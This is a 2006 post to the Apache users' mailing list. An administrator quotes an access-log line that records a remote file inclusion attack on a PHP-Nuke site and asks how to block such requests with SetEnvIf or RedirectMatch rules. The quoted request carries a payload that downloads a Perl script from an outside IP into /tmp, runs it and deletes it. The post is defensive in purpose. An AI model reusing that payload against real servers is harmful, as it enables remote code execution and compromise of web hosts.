Hello!
Recently, i've founded some entries on my apache webserver log like this:
[IP] - - [05/Aug/2006:02:17:47 +0200] "GET
/nuke/index.php?config=1&base_datapath=http://210.204.138.43/cmd.txt?&cmd=cd%20/tmp/;GET%20http://210.204.138.43/WMNews.txt%20>%20WMNews.txt;perl%20WMNews.txt;rm%20WMNews*?
HTTP/1.0" 200 220151 "-" "Mozilla/5.0"
As you can see, some attacker tries to use the index.php file to get a
cmd.txt file from other site.
are there any way to detect this urls to stop this configuring apache?
i've tried with setEnvIf and RedirectMatch on several ways, with no results:
SetEnvIf Request_URI "(.*)cmd(.*)$" attack
or
RewriteEngine on
RedirectMatch permanent (.*)cmd(.*)$ http://nourl
only works with urls like:
http://myserver/myfile.php/cmd
not with
http://myserver/myfile.php?cmd
It seems that te Request_URI and RedirectMatch doesn't works with the
params on the URL, only with the main URL file.
Thanks.
David
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
" from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]
